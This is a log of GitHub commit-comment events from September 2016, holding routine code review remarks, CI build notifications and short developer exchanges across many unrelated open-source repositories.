{"id":"4554759996","type":"CommitCommentEvent","actor":{"login":"sandermangel"},"repo":{"name":"Adyen/adyen-magento"},"payload":{"comment":{"id":18999367,"position":39,"line":39,"path":"app/design/adminhtml/default/default/template/adyen/info/apple_pay.phtml","commit_id":"aa5051d5370452d241429433dedcc12f5626c8cd","created_at":"2016-09-13T10:33:44Z","updated_at":"2016-09-13T10:33:44Z","body":"Hardcoded test url"}},"created_at":"2016-09-13T10:33:44Z"}
{"id":"4554760028","type":"CommitCommentEvent","actor":{"login":"skyingcc"},"repo":{"name":"skyingcc/eternityspring.github.io"},"payload":{"comment":{"id":18999368,"position":null,"line":null,"path":null,"commit_id":"5762b294f2f77e4dae5fd463959464cec135bd48","created_at":"2016-09-13T10:33:44Z","updated_at":"2016-09-13T10:33:44Z","body":"额  ，负担"}},"created_at":"2016-09-13T10:33:44Z"}
{"id":"4554760092","type":"CommitCommentEvent","actor":{"login":"ltratt"},"repo":{"name":"softdevteam/krun"},"payload":{"comment":{"id":18999369,"position":null,"line":null,"path":null,"commit_id":"886e500f5ecb428710e8bc0dbc1f4f2734fe2006","created_at":"2016-09-13T10:33:46Z","updated_at":"2016-09-13T10:33:46Z","body":"I'm still not convinced the comment is accurate. \"Overflow is possible, but unlikely\" seems more reasonable?"}},"created_at":"2016-09-13T10:33:46Z"}
{"id":"4554760232","type":"CommitCommentEvent","actor":{"login":"sandermangel"},"repo":{"name":"Adyen/adyen-magento"},"payload":{"comment":{"id":18999370,"position":41,"line":41,"path":"app/design/adminhtml/default/default/template/adyen/info/apple_pay.phtml","commit_id":"aa5051d5370452d241429433dedcc12f5626c8cd","created_at":"2016-09-13T10:33:47Z","updated_at":"2016-09-13T10:33:47Z","body":"Hardcoded test url"}},"created_at":"2016-09-13T10:33:47Z"}
{"id":"4554760372","type":"CommitCommentEvent","actor":{"login":"deiwin"},"repo":{"name":"deiwin/vim-dotfiles"},"payload":{"comment":{"id":18999371,"position":null,"line":null,"path":null,"commit_id":"41386b4c739f0a548ed833073fc7d2ae465c98db","created_at":"2016-09-13T10:33:49Z","updated_at":"2016-09-13T10:33:49Z","body":"Essentially, now whenever I edit a file in a JavaScript project, Gutentags (a vim plugin) will automatically generate tags for the entire project for me. This means I can use `g]` to jump to the definition of the word under the cursor,  for example, etc. See `:h tags` for more info on tags."}},"created_at":"2016-09-13T10:33:49Z"}
{"id":"4554761087","type":"CommitCommentEvent","actor":{"login":"naomipol"},"repo":{"name":"shulamyt/shareMyBooks"},"payload":{"comment":{"id":18999373,"position":22,"line":13,"path":"server/rest/userRest.js","commit_id":"97053c8edd6b095a33f230a322ec37c02cc515e9","created_at":"2016-09-13T10:33:59Z","updated_at":"2016-09-13T10:33:59Z","body":"You need to return Success if the user creation succeeded and the user object that was created (because now it contains a user_id)"}},"created_at":"2016-09-13T10:33:59Z"}
{"id":"4554761925","type":"CommitCommentEvent","actor":{"login":"WikiaJenkins"},"repo":{"name":"Wikia/app"},"payload":{"comment":{"id":18999376,"position":null,"line":null,"path":null,"commit_id":"8c76fa7f1f863e6b860da537b43a5243481f7830","created_at":"2016-09-13T10:34:10Z","updated_at":"2016-09-13T10:34:10Z","body":"**[unitTests_php_branches run failed](http://jenkins.wikia-prod:8080/job/unitTests_php_branches/35239/testReport/) for this commit**"}},"created_at":"2016-09-13T10:34:10Z"}
{"id":"4554763552","type":"CommitCommentEvent","actor":{"login":"sandermangel"},"repo":{"name":"Adyen/adyen-magento"},"payload":{"comment":{"id":18999379,"position":3,"line":3,"path":"app/design/frontend/base/default/template/adyen/apple_pay.phtml","commit_id":"aa5051d5370452d241429433dedcc12f5626c8cd","created_at":"2016-09-13T10:34:31Z","updated_at":"2016-09-13T10:34:31Z","body":"Would recommend moving line 3 - 22 to a block class to limit business logic in the presentation layer"}},"created_at":"2016-09-13T10:34:31Z"}
{"id":"4554766374","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":18999390,"position":null,"line":null,"path":null,"commit_id":"c40b2d1724901fa00b2b10edf28b2939acbff302","created_at":"2016-09-13T10:35:12Z","updated_at":"2016-09-13T10:35:12Z","body":"os_2.0_develop_signal_slot_bug (kbenne) - i386-Windows-7-VisualStudio-12: Tests Failed (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-c40b2d1724901fa00b2b10edf28b2939acbff302-i386-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-c40b2d1724901fa00b2b10edf28b2939acbff302-i386-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-13T10:35:12Z"}
{"id":"4554769098","type":"CommitCommentEvent","actor":{"login":"lordofthejars"},"repo":{"name":"dipak-pawar/arquillian-governor"},"payload":{"comment":{"id":18999394,"position":7,"line":112,"path":"jira/pom.xml","commit_id":"ba02922583759336796b8dfd93d327be8a695373","created_at":"2016-09-13T10:35:45Z","updated_at":"2016-09-13T10:35:45Z","body":"Add scope as provided, user is the one who decided if wants to use reporter or not and which version"}},"created_at":"2016-09-13T10:35:45Z"}
{"id":"4554769501","type":"CommitCommentEvent","actor":{"login":"lordofthejars"},"repo":{"name":"dipak-pawar/arquillian-governor"},"payload":{"comment":{"id":18999395,"position":12,"line":117,"path":"jira/pom.xml","commit_id":"ba02922583759336796b8dfd93d327be8a695373","created_at":"2016-09-13T10:35:51Z","updated_at":"2016-09-13T10:35:51Z","body":"Same as before"}},"created_at":"2016-09-13T10:35:51Z"}
{"id":"4554771619","type":"CommitCommentEvent","actor":{"login":"enginmarshall"},"repo":{"name":"enginmarshall/BouvetOrebroEuler"},"payload":{"comment":{"id":18999398,"position":null,"line":null,"path":null,"commit_id":"a3a388dcd67b164dcb9da572ae2bd907e273cd44","created_at":"2016-09-13T10:36:21Z","updated_at":"2016-09-13T10:36:21Z","body":"En annan lösning på problem 1"}},"created_at":"2016-09-13T10:36:21Z"}
{"id":"4554771999","type":"CommitCommentEvent","actor":{"login":"oscar-ol"},"repo":{"name":"cakephp/cakephp"},"payload":{"comment":{"id":18999399,"position":null,"line":null,"path":null,"commit_id":"5253f0b3bd06f3a1e3cc776e6dd90116a5a108e4","created_at":"2016-09-13T10:36:26Z","updated_at":"2016-09-13T10:36:26Z","body":"if I have activated the Security component, this change blackholes postLinks."}},"created_at":"2016-09-13T10:36:26Z"}
{"id":"4554772076","type":"CommitCommentEvent","actor":{"login":"lordofthejars"},"repo":{"name":"dipak-pawar/arquillian-governor"},"payload":{"comment":{"id":18999400,"position":14,"line":38,"path":"jira/src/main/java/org/arquillian/extension/governor/jira/JiraGovernorExtension.java","commit_id":"ba02922583759336796b8dfd93d327be8a695373","created_at":"2016-09-13T10:36:28Z","updated_at":"2016-09-13T10:36:28Z","body":"This is why my previous comment. Thanks of this, you are protecting from ClassNotFound problems."}},"created_at":"2016-09-13T10:36:28Z"}
{"id":"4554772086","type":"CommitCommentEvent","actor":{"login":"naomipol"},"repo":{"name":"shulamyt/shareMyBooks"},"payload":{"comment":{"id":18999401,"position":7,"line":5,"path":"server/rest/userRest.js","commit_id":"97053c8edd6b095a33f230a322ec37c02cc515e9","created_at":"2016-09-13T10:36:28Z","updated_at":"2016-09-13T10:36:28Z","body":"The parameter should obviously be `user_id`"}},"created_at":"2016-09-13T10:36:28Z"}
{"id":"4554774191","type":"CommitCommentEvent","actor":{"login":"ChameleonTartu"},"repo":{"name":"deiwin/vim-dotfiles"},"payload":{"comment":{"id":18999403,"position":null,"line":null,"path":null,"commit_id":"41386b4c739f0a548ed833073fc7d2ae465c98db","created_at":"2016-09-13T10:36:59Z","updated_at":"2016-09-13T10:36:59Z","body":"Cool!"}},"created_at":"2016-09-13T10:36:59Z"}
{"id":"4554774563","type":"CommitCommentEvent","actor":{"login":"quesoo"},"repo":{"name":"bangprovn/android_kernel_lge_g3"},"payload":{"comment":{"id":18999404,"position":null,"line":null,"path":null,"commit_id":"682e19667674c3d21de4056939611da3b20d99bf","created_at":"2016-09-13T10:37:04Z","updated_at":"2016-09-13T10:37:04Z","body":"Almost everything. Check xda"}},"created_at":"2016-09-13T10:37:04Z"}
{"id":"4554774760","type":"CommitCommentEvent","actor":{"login":"ccp92"},"repo":{"name":"ccp92/fccportfolio"},"payload":{"comment":{"id":18999405,"position":null,"line":null,"path":null,"commit_id":"59f80d008765d849944712285b8b1ceeb045124f","created_at":"2016-09-13T10:37:07Z","updated_at":"2016-09-13T10:37:07Z","body":"Still looking into over-riding the default text colour on the navbar bootstrap element."}},"created_at":"2016-09-13T10:37:07Z"}
{"id":"4554775604","type":"CommitCommentEvent","actor":{"login":"githubchen001"},"repo":{"name":"githubchen001/fangDZDPui"},"payload":{"comment":{"id":18999406,"position":29,"line":27,"path":"app/login/QuickLogin.js","commit_id":"8b1de971cc5faf8f2e7f90b8ac22e59031a739f5","created_at":"2016-09-13T10:37:18Z","updated_at":"2016-09-13T10:37:18Z","body":"去掉无用的空格"}},"created_at":"2016-09-13T10:37:18Z"}
{"id":"4554778599","type":"CommitCommentEvent","actor":{"login":"naomipol"},"repo":{"name":"shulamyt/shareMyBooks"},"payload":{"comment":{"id":18999408,"position":11,"line":9,"path":"server/rest/userRest.js","commit_id":"97053c8edd6b095a33f230a322ec37c02cc515e9","created_at":"2016-09-13T10:37:55Z","updated_at":"2016-09-13T10:37:55Z","body":"Add another then function for failure and return `res.status(500)` , Do the same for all function"}},"created_at":"2016-09-13T10:37:55Z"}
{"id":"4554778810","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":18999409,"position":null,"line":null,"path":null,"commit_id":"c40b2d1724901fa00b2b10edf28b2939acbff302","created_at":"2016-09-13T10:37:57Z","updated_at":"2016-09-13T10:37:57Z","body":"os_2.0_develop_signal_slot_bug (kbenne) - Win64-Windows-7-VisualStudio-12: Tests Failed (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-c40b2d1724901fa00b2b10edf28b2939acbff302-Win64-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-c40b2d1724901fa00b2b10edf28b2939acbff302-Win64-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-13T10:37:57Z"}
{"id":"4554782597","type":"CommitCommentEvent","actor":{"login":"klightspeed"},"repo":{"name":"EDDiscovery/EDDiscovery"},"payload":{"comment":{"id":18999412,"position":null,"line":null,"path":null,"commit_id":"73bc0e70bb180601fdb2abeb64db27bb468a3ae2","created_at":"2016-09-13T10:38:48Z","updated_at":"2016-09-13T10:38:48Z","body":"@Majkl578 Are we fine to remove this branch now that EDDiscovery runs under Mono on Linux and OS X?"}},"created_at":"2016-09-13T10:38:48Z"}
{"id":"4554783240","type":"CommitCommentEvent","actor":{"login":"vext01"},"repo":{"name":"softdevteam/krun"},"payload":{"comment":{"id":18999415,"position":null,"line":null,"path":null,"commit_id":"886e500f5ecb428710e8bc0dbc1f4f2734fe2006","created_at":"2016-09-13T10:38:57Z","updated_at":"2016-09-13T10:38:57Z","body":"It really is impossible on our systems.\r\n\r\nYou would need 2**64 / 2**42 = 4194304 cores to overflow `cycles`.\r\n\r\nIf you see what I mean...\r\n"}},"created_at":"2016-09-13T10:38:57Z"}
{"id":"4554785185","type":"CommitCommentEvent","actor":{"login":"sunset1215"},"repo":{"name":"sunset1215/rcs"},"payload":{"comment":{"id":18999418,"position":null,"line":null,"path":null,"commit_id":"904fc6aff546e28c14ed88cfb28f544d05690602","created_at":"2016-09-13T10:39:21Z","updated_at":"2016-09-13T10:39:21Z","body":"@bangwu93 Yea, on SourceTree. You should have the latest master branch on your local machine right, since you added this file? Or you haven't clone the repo?"}},"created_at":"2016-09-13T10:39:21Z"}
{"id":"4554785442","type":"CommitCommentEvent","actor":{"login":"dreammed"},"repo":{"name":"dreammed/SevenKnightsAI"},"payload":{"comment":{"id":18999419,"position":null,"line":null,"path":null,"commit_id":"c62d87301a16e6fef4235f9d9c19296b8d8cfcc1","created_at":"2016-09-13T10:39:25Z","updated_at":"2016-09-13T10:39:25Z","body":"it completely fix with new update but i will release when i done hero count per day i think at this night"}},"created_at":"2016-09-13T10:39:25Z"}
{"id":"4554787951","type":"CommitCommentEvent","actor":{"login":"vext01"},"repo":{"name":"softdevteam/krun"},"payload":{"comment":{"id":18999425,"position":null,"line":null,"path":null,"commit_id":"886e500f5ecb428710e8bc0dbc1f4f2734fe2006","created_at":"2016-09-13T10:39:58Z","updated_at":"2016-09-13T10:39:58Z","body":"But that is not to say another machine may pop up with a wider performance counter, for example."}},"created_at":"2016-09-13T10:39:58Z"}
{"id":"4554791708","type":"CommitCommentEvent","actor":{"login":"ltratt"},"repo":{"name":"softdevteam/krun"},"payload":{"comment":{"id":18999435,"position":null,"line":null,"path":null,"commit_id":"886e500f5ecb428710e8bc0dbc1f4f2734fe2006","created_at":"2016-09-13T10:40:50Z","updated_at":"2016-09-13T10:40:50Z","body":"Ah, I think I see what you're saying. Because of wraparound, if something spills over 42 bits, we can't tell. So you really do need a huge number of cores to cause an issue."}},"created_at":"2016-09-13T10:40:50Z"}
{"id":"4554793747","type":"CommitCommentEvent","actor":{"login":"seyfahni"},"repo":{"name":"SpongePowered/plugin-meta"},"payload":{"comment":{"id":18999442,"position":null,"line":null,"path":null,"commit_id":"de10104ae283be5d8dededef94f8beff5b9f15a0","created_at":"2016-09-13T10:41:19Z","updated_at":"2016-09-13T10:41:19Z","body":"Why did you do this? Wasn't `groupId.artifactId` a nice plugin ID?"}},"created_at":"2016-09-13T10:41:19Z"}
{"id":"4554804515","type":"CommitCommentEvent","actor":{"login":"ThomasKaiser"},"repo":{"name":"igorpecovnik/lib"},"payload":{"comment":{"id":18999473,"position":null,"line":null,"path":null,"commit_id":"df8d535230d4066017567b36964f5b854be9090d","created_at":"2016-09-13T10:43:47Z","updated_at":"2016-09-13T10:43:47Z","body":"Yeah, that was something I already wondered about. Thought with the new fixes behaviour might differ but obviously it's not. Thx for the quick fix anyway :)"}},"created_at":"2016-09-13T10:43:47Z"}
{"id":"4554806358","type":"CommitCommentEvent","actor":{"login":"warmhug"},"repo":{"name":"ant-design/ant-design-mobile"},"payload":{"comment":{"id":18999478,"position":15,"line":51,"path":"components/_util/touchableFeedback.tsx","commit_id":"b3e0068970a0cd09aab8e4b87c094e3f4e60a4b3","created_at":"2016-09-13T10:44:12Z","updated_at":"2016-09-13T10:44:12Z","body":"这里应该是 this.props.onMouseDown 吧，不然自己在组件上写的 onMouseDown 怎么触发？"}},"created_at":"2016-09-13T10:44:12Z"}
{"id":"4554807309","type":"CommitCommentEvent","actor":{"login":"warmhug"},"repo":{"name":"ant-design/ant-design-mobile"},"payload":{"comment":{"id":18999480,"position":24,"line":58,"path":"components/_util/touchableFeedback.tsx","commit_id":"b3e0068970a0cd09aab8e4b87c094e3f4e60a4b3","created_at":"2016-09-13T10:44:23Z","updated_at":"2016-09-13T10:44:23Z","body":"这也是"}},"created_at":"2016-09-13T10:44:23Z"}
{"id":"4554810048","type":"CommitCommentEvent","actor":{"login":"WikiaJenkins"},"repo":{"name":"Wikia/app"},"payload":{"comment":{"id":18999487,"position":null,"line":null,"path":null,"commit_id":"295d808118ad7f1a6c99723abd07c4fde126d1e0","created_at":"2016-09-13T10:45:00Z","updated_at":"2016-09-13T10:45:00Z","body":"**[unitTests_php_branches run failed](http://jenkins.wikia-prod:8080/job/unitTests_php_branches/35242/testReport/) for this commit**"}},"created_at":"2016-09-13T10:45:00Z"}
{"id":"4554811892","type":"CommitCommentEvent","actor":{"login":"wqTang"},"repo":{"name":"wqTang/MyFirstStore"},"payload":{"comment":{"id":18999492,"position":2,"line":2,"path":"README.md","commit_id":"ae2cb831c9762fa3bffa0e6051dc759439a77106","created_at":"2016-09-13T10:45:26Z","updated_at":"2016-09-13T10:45:26Z","body":"??"}},"created_at":"2016-09-13T10:45:26Z"}
{"id":"4554812964","type":"CommitCommentEvent","actor":{"login":"lordofthejars"},"repo":{"name":"dipak-pawar/arquillian-governor"},"payload":{"comment":{"id":18999493,"position":43,"line":43,"path":"jira/src/main/java/org/arquillian/extension/governor/jira/impl/reporter/JiraGovernorRecorder.java","commit_id":"ba02922583759336796b8dfd93d327be8a695373","created_at":"2016-09-13T10:45:39Z","updated_at":"2016-09-13T10:45:39Z","body":"testClass `isAnnotationPresent` just checks in current class but not in the subclasses. Can you check if JIRA extension supports defining `JIRA` annotations in subclasses, and if it is the case adapt this part?\r\n\r\nIf JIRA extension does not support defining the annotation in subclasses then this part is ok"}},"created_at":"2016-09-13T10:45:39Z"}
{"id":"4554813846","type":"CommitCommentEvent","actor":{"login":"wqTang"},"repo":{"name":"wqTang/MyFirstStore"},"payload":{"comment":{"id":18999497,"position":null,"line":null,"path":null,"commit_id":"ae2cb831c9762fa3bffa0e6051dc759439a77106","created_at":"2016-09-13T10:45:51Z","updated_at":"2016-09-13T10:45:51Z","body":"Try to use github"}},"created_at":"2016-09-13T10:45:51Z"}
{"id":"4554818428","type":"CommitCommentEvent","actor":{"login":"matheuseduardo"},"repo":{"name":"mgp25/Instagram-API"},"payload":{"comment":{"id":18999508,"position":null,"line":null,"path":null,"commit_id":"85a468092fecf967b0c6652604e85ee1362f73d8","created_at":"2016-09-13T10:46:53Z","updated_at":"2016-09-13T10:46:53Z","body":"GOD BLESS U"}},"created_at":"2016-09-13T10:46:53Z"}
{"id":"4554818977","type":"CommitCommentEvent","actor":{"login":"sandermangel"},"repo":{"name":"Adyen/adyen-magento"},"payload":{"comment":{"id":18999509,"position":14,"line":14,"path":"app/code/community/Adyen/Payment/Block/ApplePay.php","commit_id":"aa5051d5370452d241429433dedcc12f5626c8cd","created_at":"2016-09-13T10:47:00Z","updated_at":"2016-09-13T10:47:00Z","body":"shouldn't this be an adyen email address instead of `license@magentocommerce.com`"}},"created_at":"2016-09-13T10:47:00Z"}
{"id":"4554820517","type":"CommitCommentEvent","actor":{"login":"lordofthejars"},"repo":{"name":"dipak-pawar/arquillian-governor"},"payload":{"comment":{"id":18999511,"position":46,"line":46,"path":"jira/src/main/java/org/arquillian/extension/governor/jira/impl/reporter/JiraGovernorRecorder.java","commit_id":"ba02922583759336796b8dfd93d327be8a695373","created_at":"2016-09-13T10:47:21Z","updated_at":"2016-09-13T10:47:21Z","body":"you can use `equals` directly without `toString` since `Method` object implements `equals`"}},"created_at":"2016-09-13T10:47:21Z"}
{"id":"4554826657","type":"CommitCommentEvent","actor":{"login":"nakulbharuka"},"repo":{"name":"banoresaurabh/Drug-store-app"},"payload":{"comment":{"id":18999520,"position":236,"line":236,"path":"final/exp.Designer.cs","commit_id":"6ccbde698cb0072c2b38674d1860f96e2ea18c3c","created_at":"2016-09-13T10:48:43Z","updated_at":"2016-09-13T10:48:43Z","body":"The designer cannot process unknown name 'minimize' at line 236. The code within the method 'InitializeComponent' is generated by the designer and should not be manually modified. Please remove any changes and try opening the designer again. \r\nfinal.properties.resources does not contain a definition for 'minimize'."}},"created_at":"2016-09-13T10:48:43Z"}
{"id":"4554829601","type":"CommitCommentEvent","actor":{"login":"canyousee"},"repo":{"name":"canyousee/ahelloworld"},"payload":{"comment":{"id":18999524,"position":null,"line":null,"path":null,"commit_id":"4fca9fd033dd593cbe0f102f7d39f3dac5f357de","created_at":"2016-09-13T10:49:23Z","updated_at":"2016-09-13T10:49:23Z","body":"#include<stdio.h>"}},"created_at":"2016-09-13T10:49:23Z"}
{"id":"4554830162","type":"CommitCommentEvent","actor":{"login":"vext01"},"repo":{"name":"softdevteam/krun"},"payload":{"comment":{"id":18999526,"position":null,"line":null,"path":null,"commit_id":"886e500f5ecb428710e8bc0dbc1f4f2734fe2006","created_at":"2016-09-13T10:49:31Z","updated_at":"2016-09-13T10:49:31Z","body":"That's a separate issue, we would never be able to detect an individual counter overflowing its 42-bits, no.\r\n\r\nWhat I am getting at here is that we would need a tremendous number of cores to max out the 64-bit variable we are using to sum up these 42-bit values."}},"created_at":"2016-09-13T10:49:31Z"}
{"id":"4554830343","type":"CommitCommentEvent","actor":{"login":"nakulbharuka"},"repo":{"name":"banoresaurabh/Drug-store-app"},"payload":{"comment":{"id":18999527,"position":246,"line":246,"path":"final/exp.Designer.cs","commit_id":"6ccbde698cb0072c2b38674d1860f96e2ea18c3c","created_at":"2016-09-13T10:49:33Z","updated_at":"2016-09-13T10:49:33Z","body":"final.properties.resources does not contain a definition for 'close2'."}},"created_at":"2016-09-13T10:49:33Z"}
{"id":"4554830347","type":"CommitCommentEvent","actor":{"login":"awhiemstra"},"repo":{"name":"Ultimaker/Cura"},"payload":{"comment":{"id":18999528,"position":null,"line":null,"path":null,"commit_id":"f81a5fe3017d37106ad3d96f26d152f151a7f133","created_at":"2016-09-13T10:49:33Z","updated_at":"2016-09-13T10:49:33Z","body":"To be fair, the serialization code should _not_ check whether it is read only or not. The calling code should determine if it wants a read-only containers to be serialized or not. Serialization makes no assumptions about what use case the serialization is for, so it may very well be fine to serialize a read-only container."}},"created_at":"2016-09-13T10:49:33Z"}
{"id":"4554837693","type":"CommitCommentEvent","actor":{"login":"maurofmferrao"},"repo":{"name":"maurofmferrao/xibo-cms"},"payload":{"comment":{"id":18999544,"position":null,"line":null,"path":null,"commit_id":"203b85eb8f1cf2cbb029105ea033959e93259171","created_at":"2016-09-13T10:51:16Z","updated_at":"2016-09-13T10:51:16Z","body":"@dasgarner  Thank you for the test case tip. I've tested it and it worked, maybe because the second parameter is a object without the \"href\" and the removeAttr() doesn't do anything with it.\r\nDo you think it's better to add a condition to those added lines?"}},"created_at":"2016-09-13T10:51:16Z"}
{"id":"4554841527","type":"CommitCommentEvent","actor":{"login":"stackOverMind"},"repo":{"name":"WildDogTeam/wilddog-doc2"},"payload":{"comment":{"id":18999552,"position":null,"line":null,"path":null,"commit_id":"55f37eecd51298a9e4ead94eaaa27b6ddc4d3ac2","created_at":"2016-09-13T10:52:09Z","updated_at":"2016-09-13T10:52:09Z","body":"这么搞如何维护呢？"}},"created_at":"2016-09-13T10:52:09Z"}
{"id":"4554854551","type":"CommitCommentEvent","actor":{"login":"lordofthejars"},"repo":{"name":"dipak-pawar/arquillian-governor"},"payload":{"comment":{"id":18999577,"position":49,"line":49,"path":"jira/src/main/java/org/arquillian/extension/governor/jira/impl/reporter/JiraGovernorRecorder.java","commit_id":"ba02922583759336796b8dfd93d327be8a695373","created_at":"2016-09-13T10:55:08Z","updated_at":"2016-09-13T10:55:08Z","body":"Don't understand very much this logic, since you can have `@JIRA` in method or class. But you are only getting from method. Also you are using GovernorRegistry but not sure if it is required. I mean what you need to do if I am not wrong is:\r\n\r\n```\r\npublic Jira getJira() {\r\nJira jira = testMethodAnnotation.getAnnottion(Jira);\r\n\r\nif (jira == null) {\r\n// means that no method annotated let's check the class\r\n  jira = testClass.getAnnotation(Jira) //Maybe you will need to check current class and subclasses (see my previous comment)\r\n\r\nreturn jira;\r\n\r\n}\r\n\r\n// and then \r\n\r\nJira jira = getJira();\r\n\r\nif jira != null {\r\n // logic\r\n}\r\n\r\n```"}},"created_at":"2016-09-13T10:55:08Z"}
{"id":"4554861573","type":"CommitCommentEvent","actor":{"login":"lordofthejars"},"repo":{"name":"dipak-pawar/arquillian-governor"},"payload":{"comment":{"id":18999585,"position":18,"line":170,"path":"pom.xml","commit_id":"ba02922583759336796b8dfd93d327be8a695373","created_at":"2016-09-13T10:56:43Z","updated_at":"2016-09-13T10:56:43Z","body":"Same as before"}},"created_at":"2016-09-13T10:56:43Z"}
{"id":"4554862377","type":"CommitCommentEvent","actor":{"login":"ThomasKaiser"},"repo":{"name":"igorpecovnik/lib"},"payload":{"comment":{"id":18999588,"position":null,"line":null,"path":null,"commit_id":"195de287f2fe68baf510ce77b28b4a129aa4d24e","created_at":"2016-09-13T10:56:54Z","updated_at":"2016-09-13T10:56:54Z","body":"> do you remember why this is there?\r\n\r\nAt least it was motivated by this https://irclog.whitequark.org/linux-sunxi/2016-02-05#15404179;\r\n\r\n> <ssvb> tkaiser: if you have DVFS supported in the kernel and reboot the board, then U-Boot starts with whatever was the last configured voltage\r\n\r\nI would assume both values are the default and so the entries can be removed?"}},"created_at":"2016-09-13T10:56:54Z"}
{"id":"4554864547","type":"CommitCommentEvent","actor":{"login":"ltratt"},"repo":{"name":"softdevteam/krun"},"payload":{"comment":{"id":18999590,"position":null,"line":null,"path":null,"commit_id":"886e500f5ecb428710e8bc0dbc1f4f2734fe2006","created_at":"2016-09-13T10:57:25Z","updated_at":"2016-09-13T10:57:25Z","body":"Yes, we're in agreement."}},"created_at":"2016-09-13T10:57:25Z"}
{"id":"4554866743","type":"CommitCommentEvent","actor":{"login":"bigj-games"},"repo":{"name":"bigj-games/game-platform"},"payload":{"comment":{"id":18999599,"position":15,"line":15,"path":"blackjack/src/main/java/org/bigj/blackjack/web/controller/PageController.java","commit_id":"0bbe193b511a31dbbe99d9ea5267bbd40871f261","created_at":"2016-09-13T10:57:56Z","updated_at":"2016-09-13T10:57:56Z","body":" Replace by @GetMapping"}},"created_at":"2016-09-13T10:57:56Z"}
{"id":"4554872643","type":"CommitCommentEvent","actor":{"login":"simon816"},"repo":{"name":"SpongePowered/plugin-meta"},"payload":{"comment":{"id":18999607,"position":null,"line":null,"path":null,"commit_id":"de10104ae283be5d8dededef94f8beff5b9f15a0","created_at":"2016-09-13T10:59:18Z","updated_at":"2016-09-13T10:59:18Z","body":"Since https://github.com/SpongePowered/SpongeAPI/issues/1170 plugin IDs shouldn't be qualified.\r\nThis commit is in response to https://github.com/SpongePowered/SpongeAPI/commit/ad27f2f8b7a66fd3cd167ba39ffc07d225736326#commitcomment-17408089, for API 5"}},"created_at":"2016-09-13T10:59:18Z"}
{"id":"4554877489","type":"CommitCommentEvent","actor":{"login":"JustinMason"},"repo":{"name":"ClearMeasureLabs/ClearMeasureBootcamp"},"payload":{"comment":{"id":18999618,"position":null,"line":null,"path":null,"commit_id":"18a0978b24243fc97f75ff353bd7a4856499dd37","created_at":"2016-09-13T11:00:26Z","updated_at":"2016-09-13T11:00:26Z","body":"TeamCity ClearMeasureBootcamp :: 1 - Integration Build [Build 2.0.166](http://build.clear-measure.com/viewLog.html?buildId=10425&buildTypeId=ClearMeasureBootcamp_1IntegrationBuild&guest=1) is now running\n"}},"created_at":"2016-09-13T11:00:26Z"}
{"id":"4554878704","type":"CommitCommentEvent","actor":{"login":"HeVictor"},"repo":{"name":"HeVictor/VOXSPELL-Prototype"},"payload":{"comment":{"id":18999619,"position":null,"line":null,"path":null,"commit_id":"d4fda336ef97e4dac6fde0d36f6e9c0e15e8ad75","created_at":"2016-09-13T11:00:43Z","updated_at":"2016-09-13T11:00:43Z","body":"Ignore this, this was an accidental commit of nothing new."}},"created_at":"2016-09-13T11:00:43Z"}
{"id":"4554879908","type":"CommitCommentEvent","actor":{"login":"liuxyc"},"repo":{"name":"Valloric/YouCompleteMe"},"payload":{"comment":{"id":18999621,"position":null,"line":null,"path":null,"commit_id":"5dca552d5daee69c064374146bcda9e63be63b20","created_at":"2016-09-13T11:00:59Z","updated_at":"2016-09-13T11:00:59Z","body":"Thanks micbou, i update my vim to 8.0, it works"}},"created_at":"2016-09-13T11:00:59Z"}
{"id":"4554880345","type":"CommitCommentEvent","actor":{"login":"error-code"},"repo":{"name":"sentsin/layui"},"payload":{"comment":{"id":18999622,"position":null,"line":null,"path":null,"commit_id":"e9d0e1bdb3f4de1ad26ad3e077e2944469155f5a","created_at":"2016-09-13T11:01:06Z","updated_at":"2016-09-13T11:01:06Z","body":"嘛时发布唉"}},"created_at":"2016-09-13T11:01:06Z"}
{"id":"4554883929","type":"CommitCommentEvent","actor":{"login":"cdv-dev"},"repo":{"name":"DimaKhaver/Android-timer"},"payload":{"comment":{"id":18999628,"position":33,"line":33,"path":"app/src/main/java/com/bignerdranch/android/androidtimer/MainActivity.java","commit_id":"bca67b25bf4df896af1c0995fdfe6212eec4eb5b","created_at":"2016-09-13T11:01:57Z","updated_at":"2016-09-13T11:01:57Z","body":"This line may produce NullPointerException . Need to check if not null"}},"created_at":"2016-09-13T11:01:57Z"}
{"id":"4554886081","type":"CommitCommentEvent","actor":{"login":"Rudd-O"},"repo":{"name":"collective/collective.mediaelementjs"},"payload":{"comment":{"id":18999636,"position":4,"line":12,"path":"collective/mediaelementjs/browser/file.pt","commit_id":"cdcf4f3946ad78db0af0c0e7fc17b746bc9591db","created_at":"2016-09-13T11:02:26Z","updated_at":"2016-09-13T11:02:26Z","body":"This is looking real bad on production sites now."}},"created_at":"2016-09-13T11:02:26Z"}
{"id":"4554887882","type":"CommitCommentEvent","actor":{"login":"JustinMason"},"repo":{"name":"ClearMeasureLabs/ClearMeasureBootcamp"},"payload":{"comment":{"id":18999638,"position":null,"line":null,"path":null,"commit_id":"18a0978b24243fc97f75ff353bd7a4856499dd37","created_at":"2016-09-13T11:02:54Z","updated_at":"2016-09-13T11:02:54Z","body":"TeamCity ClearMeasureBootcamp :: 1 - Integration Build [Build 2.0.166](http://build.clear-measure.com/viewLog.html?buildId=10425&buildTypeId=ClearMeasureBootcamp_1IntegrationBuild&guest=1) outcome was **SUCCESS**\nSummary: Tests passed: 72, ignored: 2 Build time: 00:02:28"}},"created_at":"2016-09-13T11:02:54Z"}
